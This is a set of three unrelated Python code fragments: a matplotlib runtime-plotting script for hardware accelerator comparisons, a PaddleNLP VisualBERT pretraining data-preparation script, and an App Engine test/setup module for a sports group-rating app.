ax.bar(x_idx + iterval * (idx - idx_tot / 2), runtime_list, width, hatch = None, alpha=0.99, color=bs_color, label="Binary Serial")
runtime_ideal_r_list_bs_spm = []
for i in range(len(runtime_list)):
runtime_ideal_r_list_bs_spm.append(runtime_list[i] / time_ideal_list[index][-1:][i] - 1)
# 8b - wospm - ur - 32c
index = 2
runtime_list = time_list[index][-1:]
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), runtime_list, width, hatch = None, alpha=0.99, color=u6_color, label="Unary-32c")
runtime_ideal_r_list_u6_wspm = []
for i in range(len(runtime_list)):
runtime_ideal_r_list_u6_wspm.append(runtime_list[i] / time_ideal_list[index][-1:][i] - 1)
# 8b - wospm - ur - 64c
index = 3
runtime_list = time_list[index][-1:]
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), runtime_list, width, hatch = None, alpha=0.99, color=u7_color, label="Unary-64c")
runtime_ideal_r_list_u7_wspm = []
for i in range(len(runtime_list)):
runtime_ideal_r_list_u7_wspm.append(runtime_list[i] / time_ideal_list[index][-1:][i] - 1)
# 8b - wospm - ur - 128c
index = 4
runtime_list = time_list[index][-1:]
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), runtime_list, width, hatch = None, alpha=0.99, color=u8_color, label="Unary-128c")
runtime_ideal_r_list_u8_wspm = []
for i in range(len(runtime_list)):
runtime_ideal_r_list_u8_wspm.append(runtime_list[i] / time_ideal_list[index][-1:][i] - 1)
# 8b - wospm - ug - 256c
index = 5
runtime_list = time_list[index][-1:]
idx += 1
ax.bar(x_idx + iterval * (idx - idx_tot / 2), runtime_list, width, hatch = None, alpha=0.99, color=ug_color, label="uGEMM-H")
runtime_ideal_r_list_ug_wspm = []
for i in range(len(runtime_list)):
runtime_ideal_r_list_ug_wspm.append(runtime_list[i] / time_ideal_list[index][-1:][i] - 1)
ax.set_ylabel('Runtime\n(Seconds)')
ax.set_xticks(x_idx)
ax.set_xticklabels(x_axis)
plt.xlim(x_idx[0]-0.5, x_idx[-1]+0.5)
plt.yscale("log")
_, top = plt.ylim()
locs, labels = plt.yticks()
if a == "eyeriss":
locs = locs[1:-1]
else:
locs = locs[1:]
ax.set_yticks(locs)
bottom, _ = plt.ylim()
if a == "eyeriss":
ax.set_ylim((bottom, top*80))
bottom, top = plt.ylim()
for x in x_idx:
ax.fill_betweenx([bottom, top/80], x1=x, x2=x+0.5, alpha=0.2, color=bg_color, linewidth=0)
ax.legend(loc="upper center", ncol=3, frameon=True)
else:
ax.set_ylim((bottom, top))
bottom, top = plt.ylim()
for x in x_idx:
ax.fill_betweenx([bottom, top], x1=x, x2=x+0.5, alpha=0.2, color=bg_color, linewidth=0)
y_label_list = []
for y in locs:
if y != 0:
y_label_list.append("{:1.0E}".format(abs(y)))
else:
y_label_list.append("0")
ax.set_yticklabels(y_label_list)
ax.minorticks_off()
fig.tight_layout()
plt.savefig('./outputs_fig/' + technode + '/Runtime_' + a_cap + ".pdf", bbox_inches='tight', dpi=my_dpi, pad_inches=0.02)
if print_runtime:
print("BP SPM overhead: ", runtime_ideal_r_list_bp_spm)
print("CONV mean: ", mean(runtime_ideal_r_list_bp_spm[0:5])*100, "%")
print("BR SPM overhead: ", runtime_ideal_r_list_bs_spm)
print("CONV mean: ", mean(runtime_ideal_r_list_bs_spm[0:5])*100, "%")
print("U6 WSPM overhead: ", runtime_ideal_r_list_u6_wspm)
print("CONV mean: ", mean(runtime_ideal_r_list_u6_wspm[0:5])*100, "%")
print("U7 WSPM overhead: ", runtime_ideal_r_list_u7_wspm)
print("CONV mean: ", mean(runtime_ideal_r_list_u7_wspm[0:5])*100, "%")
print("U8 WSPM overhead: ", runtime_ideal_r_list_u8_wspm)
print("CONV mean: ", mean(runtime_ideal_r_list_u8_wspm[0:5])*100, "%")
print("UG WSPM overhead: ", runtime_ideal_r_list_ug_wspm)
print("CONV mean: ", mean(runtime_ideal_r_list_ug_wspm[0:5])*100, "%")
print("Runtime fig saved!\n")
# throughput
my_dpi = 300
if a == "eyeriss":
fig_h = 1.1
else:
fig_h = 1
fig_w = 3.3115
bp_color | |
import argparse
import copy
import json
import logging
import os
import os.path as osp
import random
import time
from collections import OrderedDict
from functools import partial
import numpy as np
import paddle
from paddlenlp.data import Dict, Pad
from paddlenlp.datasets.dataset import load_dataset
from paddlenlp.transformers import (BertTokenizer, VisualBertModel,
LinearDecayWithWarmup,
VisualBertForPreTraining)
FORMAT = '%(asctime)s-%(levelname)s: %(message)s'
logging.basicConfig(level=logging.INFO, format=FORMAT)
logger = logging.getLogger(__name__)
MODEL_CLASSES = {
"visualbert": (VisualBertModel, VisualBertForPreTraining, BertTokenizer),
}
def parse_args():
parser = argparse.ArgumentParser()
parser.add_argument(
"--model_type",
default="visualbert",
type=str,
help="Model type selected in the list: " +
", ".join(MODEL_CLASSES.keys()), )
parser.add_argument(
"--bert_model_name",
default="bert-base-uncased",
type=str,
help="Path to bert model or shortcut name selected in the list: " +
", ".join(
sum([
list(classes[-1].pretrained_init_configuration.keys())
for classes in MODEL_CLASSES.values()
], [])), )
parser.add_argument(
"--model_name_or_path",
default="visualbert-vqa-coco-pre",
type=str,
help="Path to pre-trained model or shortcut name selected in the list: "
+ ", ".join(
sum([
list(classes[0].pretrained_init_configuration.keys())
for classes in MODEL_CLASSES.values()
], [])), )
parser.add_argument(
"--input_dir",
default=None,
type=str,
required=True,
help="The input directory where the data will be read from.", )
parser.add_argument(
"--output_dir",
default=None,
type=str,
required=True,
help="The output directory where the model predictions and checkpoints will be written.",
)
parser.add_argument(
"--image_feature_type",
default="coco_detectron_fix_100",
type=str,
help="`coco_detectron_fix_100` for vqa-coco-pre; `coco_detectron_fix_144` for nlvr2-coco-pre; `coco_detectron_fix_100` for vqa-pre; `nlvr2_detectron_fix_144` for nlvr2-pre; "
)
parser.add_argument(
"--dataset",
default="coco_captions",
type=str,
help="coco_captions for coco pretrain")
parser.add_argument(
"--max_seq_length",
default=128,
type=int,
help="max length of each sequence")
parser.add_argument(
"--mask_prob",
default=0.15,
type=float,
help="the probability of one word to be mask")
parser.add_argument(
"--train_batch_size",
default=2,
type=int,
help="Batch size per GPU/CPU for training.", )
parser.add_argument(
"--eval_batch_size",
default=2,
type=int,
help="Batch size per GPU/CPU for training.", )
parser.add_argument(
"--learning_rate",
default=5e-5,
type=float,
help="The initial learning rate for Adam.")
parser.add_argument(
"--weight_decay",
default=0.01,
type=float,
help="Weight decay if we apply some.")
parser.add_argument(
"--adam_epsilon",
default=1e-6,
type=float,
help="Epsilon for Adam optimizer.")
parser.add_argument(
"--num_train_epochs",
default=10,
type=int,
help="Total number of training epochs to perform.", )
parser.add_argument(
"--max_steps",
default=-1,
type=int,
help="If > 0: set total number of training steps to perform. Override num_train_epochs.",
)
parser.add_argument(
"--warmup_steps",
default=10000,
type=int,
help="Linear warmup over warmup_steps.")
parser.add_argument(
"--logging_steps",
type=int,
default=100,
help="Log every X updates steps.")
parser.add_argument(
"--save_steps",
type=int,
default=1000,
help="Save checkpoint every X updates steps.")
parser.add_argument(
"--init_from_ckpt",
action="store_true",
help="Whether to load model checkpoint. if True, args.model_name_or_path must be dir store ckpt or will train from fresh start"
)
parser.add_argument(
"--use_amp",
action="store_true",
help="Whether to use float16(Automatic Mixed Precision) to train.")
parser.add_argument(
"--seed", type=int, default=42, help="random seed for initialization")
parser.add_argument(
"--eager_run", type=bool, default=True, help="Use dygraph mode.")
parser.add_argument(
"--device",
default="gpu",
type=str,
choices=["cpu", "gpu"],
help="The device to select to train the model, is must be cpu/gpu.")
args = parser.parse_args()
return args
def set_seed(args):
# Use the same data seed(for data shuffle) for all procs to guarantee data
# consistency after sharding.
random.seed(args.seed)
np.random.seed(args.seed)
# Maybe different op seeds(for dropout) for different procs is better. By:
# `paddle.seed(args.seed + paddle.distributed.get_rank())`
paddle.seed(args.seed)
class WorkerInitObj(object):
def __init__(self, seed):
self.seed = seed
def __call__(self, id):
np.random.seed(seed=self.seed + id)
random.seed(self.seed + id)
def perform_truncate(max_seq_length, text_a, text_b):
if text_b is None:
len_total = len(text_a) + 2
text_a = text_a[:max_seq_length - 2]
else:
len_total = len(text_a) + len(text_b) + 3
if len_total > max_seq_length:
take_away_from_ctx = min((len_total - max_seq_length + 1) // 2,
max(len(text_a) - 32, 0))
take_away_from_answer = len_total - max_seq_length + take_away_from_ctx
# Follows VCR, perform truncate from the front...
text_a = text_a[take_away_from_ctx:]
text_b = text_b[take_away_from_answer:]
return text_a, text_b
def random_word(tokens, tokenizer, probability=0.15):
"""
Masking some random tokens for Language Model task with probabilities as in the original BERT paper.
:param tokens: list of str, tokenized sentence.
:param tokenizer: Tokenizer, object used for tokenization (we need it's vocab here)
:return: (list of str, list of int), masked tokens and related labels for LM prediction
"""
output_label = []
for i, token in enumerate(tokens):
prob = random.random()
# mask token with 15% probability
if prob < probability:
prob /= probability
# 80% randomly change token to mask token
if prob < 0.8:
tokens[i] = "[MASK]"
# 10% randomly change token to random token
elif prob < 0.9:
tokens[i] = random.choice(
list(tokenizer.vocab.idx_to_token.items()))[1]
# -> rest 10% randomly keep current token
# append current token to output (we will predict these later)
try:
output_label.append(tokenizer.vocab[token])
except KeyError:
# For unknown words (should not occur with BPE vocab)
output_label.append(tokenizer.vocab["[UNK]"])
logger.warning(
"Cannot find token '{}' in vocab. Using [UNK] insetad".
format(token))
else:
# no masking token (will be ignored by loss function later)
output_label.append(-1)
return tokens, output_label
def prepare_train_features_single(example, tokenizer, is_two_sentence, args):
feature = None
image_feature_type = args.image_feature_type
if image_feature_type == "coco_detectron_fix_100":
image_id = example['image_id']
split_name = example['split_name']
image_file_name = "COCO_{}2014_{:0>12d}.npy".format(split_name,
image_id)
if "train" in image_file_name:
folder = osp.join(args.input_dir,
"data/detectron_fix_100/fc6/vqa/train2014")
elif "val" in image_file_name:
folder = osp.join(args.input_dir,
"data/detectron_fix_100/fc6/vqa/val2014")
image_feat_variable = np.load(osp.join(folder, image_file_name))
visual_token_type_ids = np.zeros(
image_feat_variable.shape[:-1], dtype=np.int64)
visual_attention_mask = np.ones(
image_feat_variable.shape[:-1], dtype=np.int64)
visual_embeds = image_feat_variable.copy()
visual_token_type_ids = visual_token_type_ids.copy()
visual_attention_mask = visual_attention_mask.copy()
elif image_feature_type == "coco_detectron_fix_144":
image_id = example['image_id']
split_name = example['split_name']
image_file_name = "COCO_{}2014_{:0>12d}.npy".format(split_name,
image_id)
if "train" in image_file_name:
folder = osp.join(
args.input_dir,
"data/detectron_fix_144/nlvr2/train/feature_1024dim")
elif "val" in image_file_name:
folder = osp.join(
args.input_dir,
"data/detectron_fix_144/nlvr2/val/feature_1024dim")
image_feat_variable = np.load(osp.join(folder, image_file_name))
visual_token_type_ids = np.zeros(
image_feat_variable.shape[:-1], dtype=np.int64)
visual_attention_mask = np.ones(
image_feat_variable.shape[:-1], dtype=np.int64)
visual_embeds = image_feat_variable.copy()
visual_token_type_ids = visual_token_type_ids.copy()
visual_attention_mask = visual_attention_mask.copy()
elif image_feature_type == "nlvr2_detectron_fix_144":
caption_a = example['caption_a']
label = example['label']
identifier = example['identifier']
feature_path_0 = example['feature_path_0']
feature_path_1 = example['feature_path_1']
if "train" in identifier:
folder = osp.join(args.input_dir,
"data/detectron_fix_144/train/feature_1024dim")
elif "dev" in identifier:
folder = osp.join(args.input_dir,
"data/detectron_fix_144/dev/feature_1024dim")
elif "test1" in identifier:
folder = osp.join(args.input_dir,
"data/detectron_fix_144/test1/feature_1024dim")
detectron_features_0 = np.load(os.path.join(folder, feature_path_0))
detectron_features_1 = np.load(os.path.join(folder, feature_path_1))
detectron_features = np.concatenate(
(detectron_features_0, detectron_features_1), axis=0)
visual_embeds = detectron_features.copy()
visual_embeddings_type_0 = np.zeros(
detectron_features_0.shape[0], dtype=np.int64)
visual_embeddings_type_1 = np.ones(
detectron_features_1.shape[0], dtype=np.int64)
visual_embeddings_type = np.concatenate(
(visual_embeddings_type_0, visual_embeddings_type_1),
axis=0,
dtype=np.int64)
visual_token_type_ids = visual_embeddings_type.copy()
visual_attention_mask = np.ones(
visual_embeds.shape[:-1], dtype=np.int64)
# example["visual_embeds"] = visual_embeds.copy()
# example["visual_token_type_ids"] = visual_token_type_ids.copy()
# example["visual_attention_mask"] = visual_attention_mask.copy()
else:
raise NotImplementedError("Please use image features from disk")
feature = OrderedDict({
"visual_embeds": visual_embeds,
"visual_token_type_ids": visual_token_type_ids,
"visual_attention_mask": visual_attention_mask
})
visual_len = feature["visual_embeds"].shape[0]
assert visual_len == 100 or visual_len == 144
# Two sentence:
# task1: masked language modeling
# task2: are those sampled two sentence matched both matched ?
# Single sentence:
# task1: masked language modeling
if is_two_sentence:
tokens_a = tokenizer.tokenize(example['caption_a'])
tokens_b = tokenizer.tokenize(example['caption_b'])
tokens_a, tokens_b = perform_truncate(args.max_seq_length, tokens_a,
tokens_b)
raw_tokens_a, raw_tokens_b = tokens_a.copy(), tokens_b.copy()
tokens_a, t1_label = random_word(tokens_a, tokenizer, args.mask_prob)
tokens_b, t2_label = random_word(tokens_b, tokenizer, args.mask_prob)
# concatenate lm labels and account for CLS, SEP, SEP
lm_label_ids = ([-1] + t1_label + [-1] + t2_label + [-1])
# The convention in BERT is:
# (a) For sequence pairs:
# tokens: [CLS] is this jack ##son ##ville ? [SEP] no it is not . [SEP]
# type_ids: 0 0 0 0 0 0 0 0 1 1 1 1 1 1
tokens = []
raw_tokens = []
token_type_ids = []
raw_token_type_ids = []
tokens.append("[CLS]")
raw_tokens.append("[CLS]")
token_type_ids.append(0)
raw_token_type_ids.append(0)
for token in tokens_a:
tokens.append(token)
token_type_ids.append(0)
for token in raw_tokens_a:
raw_tokens.append(token)
raw_token_type_ids.append(0)
tokens.append("[SEP]")
raw_tokens.append("[SEP]")
token_type_ids.append(0)
raw_token_type_ids.append(0)
for token in tokens_b:
tokens.append(token)
token_type_ids.append(1)
for token in raw_tokens_b:
raw_tokens.append(token)
raw_token_type_ids.append(1)
tokens.append("[SEP]")
raw_tokens.append("[SEP]")
token_type_ids.append(1)
raw_token_type_ids.append(1)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
raw_input_ids = tokenizer.convert_tokens_to_ids(raw_tokens)
# The mask has 1 for real tokens and 0 for padding tokens. Only real
# tokens are attended to.
attention_mask = [1] * len(input_ids)
sentence_image_labels = np.array(
[1]) if example['is_correct'] == True else np.array([0])
while len(lm_label_ids) < len(tokens) + visual_len:
lm_label_ids.append(-1)
feature.update({
"tokens": tokens.copy(),
"visual_embeds": visual_embeds.copy(),
"raw_input_ids": raw_input_ids.copy(),
"input_ids": input_ids.copy(),
"token_type_ids": token_type_ids.copy(),
"attention_mask": attention_mask.copy(),
"labels": lm_label_ids.copy(),
"sentence_image_labels": sentence_image_labels.copy()
})
else:
if args.dataset == "vqa2":
question_tokens = example['question_str']
answers = example['answers']
answer = np.random.choice(answers)
tokens_a = tokenizer.tokenize(question_tokens) + tokenizer.tokenize(
answer)
elif args.dataset == "nlvr2":
tokens_a = tokenizer.tokenize(example['caption_a'])
else:
NotImplementedError(
"Unsupported dataset {} for single sentence language modeling".
format(args.dataset))
raw_tokens_a = tokens_a.copy()
tokens_a, t1_label = random_word(tokens_a, tokenizer, args.mask_prob)
# concatenate lm labels and account for CLS, SEP, SEP
lm_label_ids = ([-1] + t1_label + [-1])
# (b) For single sequences:
# tokens: [CLS] the dog is hairy . [SEP]
# type_ids: 0 0 0 0 0 0 0
tokens = []
raw_tokens = []
token_type_ids = []
raw_token_type_ids = []
tokens.append("[CLS]")
raw_tokens.append("[CLS]")
token_type_ids.append(0)
raw_token_type_ids.append(0)
for token in tokens_a:
tokens.append(token)
token_type_ids.append(0)
for token in raw_tokens_a:
raw_tokens.append(token)
raw_token_type_ids.append(0)
tokens.append("[SEP]")
raw_tokens.append("[SEP]")
token_type_ids.append(0)
raw_token_type_ids.append(0)
input_ids = tokenizer.convert_tokens_to_ids(tokens)
raw_input_ids = tokenizer.convert_tokens_to_ids(raw_tokens)
while len(lm_label_ids) < | |
<gh_stars>0
from models import *
from random import randint
FFBSKT_URL = '<KEY>'
BASKETBALL_GROUP_URL = '<KEY>'
def start(self):
self.Clear(Answer())
#key = ndb.Key(Group, '<EMAIL>', Group, 'General parametrs')
group = GroupStat(name='General parametrs', st_name=['name', 'content','rate'], st_opt=['name','0','hist'], st_ifbase=[True, True, True], role_propertys_add=[{'name':'admin', 'change':['content', 'rate', '@name'], 'visible': []}, {'name':'user' , 'change':['@content'], 'visible': ['name', 'content','rate']}])
self.create_group(group)
self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='General parametrs', group_creator='<EMAIL>', role='admin'))
self.add_user(User(mail='@unknown', name='unknown')) # write timer for unknown
group = GroupStat(name='Basketball', st_name=['name', 'rate', 'visit'], st_opt=['name','hist', 'hist'], st_ifbase=[True, True, False], role_propertys_add=[{'name':'admin', 'change':['visit', '@invite'], 'visible': ['name', 'rate']}, {'name':'user' , 'change':[], 'visible': ['name', 'rate', 'visit']}])
self.create_group(group)
group = GroupStat(name='Math', st_name=['name', 'rate','lesson_plus', 'hom_work', 'hom_work'], st_opt=['name','hist', '0','nero','ranking'], st_ifbase=[True, True, False, False, False], role_propertys_add=[{'name':'admin', 'change':['lesson_plus', 'hom_work'], 'visible': ['name']}, {'name':'user' , 'change':[], 'visible': ['name','rate', 'lesson_plus', 'hom_work']}])
self.create_group(group)
group = GroupStat(name='Gim', st_name=['name', 'visit', 'all_tickets'], st_opt=['name','0','0'], st_ifbase=[True, False, False], role_propertys_add=[{'name':'admin', 'change':['visit'], 'visible': ['name','all_tickets']}, {'name':'user' , 'change':[], 'visible': ['name', 'visit', 'all_tickets']}])
self.create_group(group)
group = GroupStat(name='Tmp', st_name=['name'], st_opt=['name'], st_ifbase=[True], role_propertys_add=[{'name':'admin', 'change':[], 'visible': []}, {'name':'user' , 'change':[], 'visible': ['name']}])
self.create_group(group)
self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='Basketball', group_creator='<EMAIL>', role='admin'))
group = GroupStat(name='Verify', st_name=['name', 'rate', 'name_verify', 'name_verify'], st_opt=['name','hist', 'nero','ranking'], st_ifbase=[True, True, False, False], role_propertys_add=[{'name':'admin', 'change':[], 'visible': ['name']}, {'name':'user' , 'change':['name_verify'], 'visible': ['name','rate']}])
self.create_group(group)
self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='Verify', group_creator='<EMAIL>', role='admin'))
#self.put_object_to_group(PutObjectTo(child_object='<EMAIL>', group_name='Basketball', group_creator='<EMAIL>', role='admin'))
#group = GroupStat(name='Tornament', st_name=['name', 'avatar', 'content', 'rate'], st_opt=['0','0','photo','points'], st_ifbase=[True, True, True, True], role_propertys_add=[{'name':'referi', 'change':['points'], 'visible': ['name', 'avatar']}, {'name':'team' , 'change':[], 'visible': ['name', 'visit', 'all_tickets']}])
#self.create_group(group)
#st_name - add all teams score, and points
#------------------------------------------------------TESTS__________________________________________------
def T_f(self, param={'mail':'<EMAIL>'}, mescls=User, f='add_user'):
print '$$ T_f ', f
u = mescls(**param)
T={}
getattr(self, f)(u)
def T_rating_test(self):
param={'name':'RT La', 'st_name':['name', 'avatar', '1km', '400m', 'jump'], 'st_opt':['0', 'photo', 'ranking','ranking','ranking'], 'st_place':[1,1,2], 'st_w':[2.0,3.0,4.0], 'st_ifbase':[True,True,False,False,False], 'role_propertys_add':[{'name':'admin', 'change':['1km', '400m', 'jump','@invite'] , 'visible': ['name']}, {'name':'@open', 'change':[],'visible': ['name','1km', '400m', 'jump']}]}
T_f(self, param=param, mescls=GroupStat, f='create_group')
print "TEST______________"
T_f(self, param={'child_object':'<EMAIL>', 'group_name':'RT La', 'group_creator':'<EMAIL>', 'role':'admin'}, mescls=PutObjectTo, f='put_object_to_group')
T_f(self, param={'child_object':'<EMAIL>', 'group_name':'RT La', 'group_creator':'<EMAIL>', 'role':'user'}, mescls=PutObjectTo, f='put_object_to_group')
#Need group url in st_block and obj url
T_f(self, param={'url':'<KEY>', 'stat_block':[{'group_url':'<KEY>', 'return_ch':[0], 'st_name':['1km'], 'st_def':['456'], 'st_opt':['ranking']}, ]}, mescls=User, f='edit_user')
T_f(self, param={'group_url':'<KEY>'}, mescls=Show, f='compute_rate')
group_url = ndb.Key(Group, '<EMAIL>', Group, 'RT La').urlsafe()
for user in ['a@','b@','c@','d@']:
T_f(self, param={'child_object':user, 'group_name':'RT La', 'group_creator':'<EMAIL>', 'role':'admin'}, mescls=PutObjectTo, f='put_object_to_group')
#param={'url':ndb.Key(Base, user).urlsafe(), 'stat_block':[{'group_url':group_url, 'return_ch':[0,1,2], 'st_name':['1km', '400m', 'jump'], 'st_def':[str(randint(240, 340)/60.0), str(randint(45, 80)), str(randint(140, 240))], 'st_opt':['ranking', 'ranking', 'ranking']}, ]}
for res in range(3):
add_stat(['a@','b@','c@','d@', '<EMAIL>'], 'RT La', param, self, )
T_f(self, param={'group_url':ndb.Key(Group, '<EMAIL>', Group, 'RT La').urlsafe()}, mescls=Show, f='compute_rate')
def add_stat(users, group, param, self, athors=[], group_creator='<EMAIL>'):
urls = []
group_url = ndb.Key(Group, group_creator, Group, group).urlsafe()
if athors == []:
for user in users:
urls.append(ndb.Key(Base, user).urlsafe())
else:
for user, auth in zip(users, athors):
urls.append(ndb.Key(Group, auth, Group, user).urlsafe())
for url in urls:
print "-__________", urls, group, group_url, ndb.Key(ObjectToGroup, group_url, ObjectToGroup, url).get()
#user_url = ndb.Key(ObjectToGroup, group_url, ObjectToGroup, url).urlsafe()
user_param={'url':url, 'stat_block':[{'group_url':group_url, 'return_ch':[], 'st_name':[], 'st_def':[], 'st_opt':[]}]}
j=0
for i, par in enumerate(param['st_opt']):
if par == 'ranking':
user_param['stat_block'][0]['st_def'].append(str(randint(0, 40)))
user_param['stat_block'][0]['return_ch'].append(j)
user_param['stat_block'][0]['st_name'].append(param['st_name'][i])
user_param['stat_block'][0]['st_opt'].append('ranking')
j+=1
T_f(self, param=user_param, mescls=User, f='edit_user')
print "ADD STAT", user_param
#-----------------------Group Structure Test---------------------------------------------------------
def put_to(child, gr_name, ch_aut='<EMAIL>', gr_aut='<EMAIL>', role='group'):
param={'child_object':child, 'child_gr_author':ch_aut, 'group_name':gr_name, 'group_creator':gr_aut, 'role':role}
return {'param':param, 'mescls':PutObjectTo, 'f':'put_object_to_group'}
#T_f(self, , param=param, mescls=PutObjectTo, f='put_object_to_group')
def T_group_structure(self, ):
T_f(self, param={'name':'Sport', 'st_name':['name', 'popularity', 'activity'], 'st_opt':['name', 'ranking','ranking'], 'st_place':[2,2], 'st_w':[1.0,2.0], 'st_ifbase':[True,False,False], 'role_propertys_add':[{'name':'@open', 'change':[],'visible': ['name','popularity', 'activity']}]}, mescls=GroupStat, f='create_group')
# Add weight like for level
T_f(self, param={'name':'Bskt', 'st_name':['name', 'level'], 'st_opt':['0', 'ranking'], 'st_place':[2], 'st_w':[1.0], 'st_ifbase':[True,False], 'role_propertys_add':[{'name':'@open', 'change':[],'visible': ['name','level']}]}, mescls=GroupStat, f='create_group')
T_f(self, param={'name':'Normatives', 'st_name':['name', '1km', '400m', 'jump'], 'st_opt':['name', 'ranking', 'ranking', 'ranking'], 'st_place':[1,1,2], 'st_w':[2.0,3.0,4.0], 'st_ifbase':[True,False,False,False], 'role_propertys_add':[{'name':'participant', 'change':[],'visible': ['name','1km', '400m', 'jump']}, {'name':'@open', 'change':[],'visible': ['name','1km', '400m', 'jump']}]}, mescls=GroupStat, f='create_group')
T_f(self, param={'name':'Referi', 'st_name':['name', 'games', 'mark', 'mark'], 'st_opt':['name', 'ranking', 'ranking', 'nero'], 'st_place':[2,2], 'st_w':[1.0, 2.0], 'st_ifbase':[True,False,False,False], 'role_propertys_add':[{'name':'@open', 'change':[],'visible': ['name', 'games', 'mark']}]}, mescls=GroupStat, f='create_group')
T_f(self, param={'name':'BsktNormatives', 'st_name':['name', 'freethrow', '3points', '8flors'], 'st_opt':['name', 'ranking','ranking','ranking'], 'st_place':[2,2,1], 'st_w':[1.0,1.3,1.4], 'st_ifbase':[True,False,False,False], 'role_propertys_add':[{'name':'@open', 'change':[],'visible': ['name', 'freethrow', '3points', '8flors']}]}, mescls=GroupStat, f='create_group')
T_f(self, param={'name':'Tornament', 'st_name':['name', 'games', 'vin'], 'st_opt':['name', '0', 'ranking'], 'st_place':[2], 'st_w':[1.0], 'st_ifbase':[True,False,False], 'role_propertys_add':[{'name':'@open', 'change':[],'visible': ['name', 'games', 'vin']}]}, mescls=GroupStat, f='create_group')
param={'name':'Team2', 'st_name':['name', 'games', 'points', 'role', 'cr'], 'st_opt':['name', '0', 'ranking', '0','0'], 'st_place':[2], 'st_w':[1.0], 'st_ifbase':[True,False,False,False,False], 'role_propertys_add':[{'name':'@open', 'change':[],'visible': ['name', 'games', 'points', 'role']}, {'name':'player', 'change':[],'visible': ['name', 'games', 'points', 'role']}, {'name':'crowd','change':[],'visible': ['name', 'cr', 'points']}]}
for team in ['Team1', 'Team2', 'Team3']:
param['name'] = team
T_f(self, param=param, mescls=GroupStat, f='create_group')
#T_f(self, param=param, mescls=GroupStat, f='create_group')
#T_f(self, param=param, mescls=GroupStat, f='create_group')
#put groups
T_f(self, **put_to(child='Normatives', gr_name='Sport'))
T_f(self, **put_to(child='Referi', gr_name='Normatives'))
T_f(self, **put_to(child='Bskt', gr_name='Sport'))
T_f(self, **put_to(child='Referi', gr_name='Bskt'))
T_f(self, **put_to(child='BsktNormatives', gr_name='Bskt'))
T_f(self, **put_to(child='Tornament', gr_name='Bskt'))
T_f(self, **put_to(child='Team1', gr_name='Tornament'))
T_f(self, **put_to(child='Team2', gr_name='Tornament'))
T_f(self, **put_to(child='Team3', gr_name='Tornament'))
#put users
T_f(self, param={'child_object':'<EMAIL>', 'group_name':'General parametrs', 'group_creator':'<EMAIL>', 'role':'user'}, mescls=PutObjectTo, f='put_object_to_group')
T_f(self, param={'child_object':'<EMAIL>', 'group_name':'Tornament', 'group_creator':'<EMAIL>', 'role':'__creator'}, mescls=PutObjectTo, f='put_object_to_group')
for user in ['cr1@','cr2@','cr3@','cr4@','cr5@','bpl1@','bpl2@','bpl3@','bpl4@','bpl5@',
'bpl6@','bpl7@','bpl8@','bpl9@','bpl10@','la1@','la2@','la3@']:
T_f(self, param={'child_object':user, 'group_name':'General parametrs', 'group_creator':'<EMAIL>', 'role':'user'}, mescls=PutObjectTo, f='put_object_to_group')
#for user in ['bpl1@','bpl2@','bpl3@']:
#T_f(self, param={'child_object':user, 'group_name':'Team3', 'group_creator':'<EMAIL>', 'role':'player'}, mescls=PutObjectTo, f='put_object_to_group')
for user in ['bpl4@','bpl5@','bpl6@']:
T_f(self, param={'child_object':user, 'group_name':'Team1', 'group_creator':'<EMAIL>', 'role':'player'}, mescls=PutObjectTo, f='put_object_to_group')
for user in ['cr1@','cr2@','cr3@','<EMAIL>']:
T_f(self, param={'child_object':user, 'group_name':'Team1', 'group_creator':'<EMAIL>', 'role':'crowd'}, mescls=PutObjectTo, f='put_object_to_group')
for user in ['bpl7@','bpl8@','bpl9@']:
T_f(self, param={'child_object':user, 'group_name':'Team2', 'group_creator':'<EMAIL>', 'role':'player'}, mescls=PutObjectTo, f='put_object_to_group')
for user in ['bpl1@','la1@','la2@','la3@']:
T_f(self, param={'child_object':user, 'group_name':'Normatives', 'group_creator':'<EMAIL>', 'role':'participant'}, mescls=PutObjectTo, f='put_object_to_group')
#T_f(self, param={'child_object':'<EMAIL>', 'group_name':'RT La', 'group_creator':'<EMAIL>', 'role':'user'}, mescls=PutObjectTo, f='put_object_to_group')
add_stat(['bpl7@','bpl8@','bpl9@'], 'Team2', param, self)
#___________________________________________________________________________________________________
def T_high_perfomance(self):
#print '111', 'qwertyuiopasdfghjklzxcvbnm'
#T_f(self, param={'user_url':FFBSKT_URL, 'is_add': True, 'group':BASKETBALL_GROUP_URL, 'role':'__id'}, mescls=EditRole, f='edit_role')
for i in 'qwertyuiopas':
for j in 'qwertyuiopasdfghjklz':
#print i+j+k+'@'
pass
#T_f(self, param={'child_object':i+j+'@', 'group_name':'General parametrs', 'group_creator':'<EMAIL>', 'role':'user'}, mescls=PutObjectTo, f='put_object_to_group')
#T_f(self, param={'child_object':i+j+'@', 'group_name':'Basketball', 'group_creator':'<EMAIL>', 'role':'user'}, mescls=PutObjectTo, f='put_object_to_group')
url = ndb.Key(Base, i+j+'@').urlsafe()
#T_f(self, param={'child_object':url, 'attribute_name': 'name', 'value':i+j}, mescls=EditEntityAttr, f='edit_entity_value')
cid = 34
for i in 'qwertyuiopas':
for j in 'qwertyuiopasdfghjklz':
T_f(self, param={'card_id':str(cid), 'child_object':i+j+'@', 'group_url':BASKETBALL_GROUP_URL, 'stat_pls':'visit'}, mescls=CardId, f='use_card')
cid += 1
def T_show(self, name1, name2, p=None):
if not p:
p=name2
#print '--T Show', repr(name1)
#print len(ndb.Key(Base, name1).get().a_f)
print 'group = ', ndb.Key(Group, name2).get()
print ndb.Key(ObjectToGroup, name1, ObjectToGroup, p).get()
print '\no b j ', (ObjectToGroup.query(ObjectToGroup.name==name1, ObjectToGroup.group_name==name2).fetch())
#(ObjectToGroup.query(ObjectToGroup.name==name1).filter(ObjectToGroup.group_name==name2).fetch())
def T_remove_all(self, message):
s = 1000
entr = Base.query().fetch()
list_of_keys = ndb.put_multi(entr)
#for i in entr:
# memcache.delete(i.mail, s)
ndb.delete_multi(list_of_keys)
entr = ObjectToGroup.query().fetch()
list_of_keys = ndb.put_multi(entr)
#for i in entr:
# memcache.delete(i.key, s)
ndb.delete_multi(list_of_keys)
entr = Group.query().fetch()
list_of_keys = ndb.put_multi(entr)
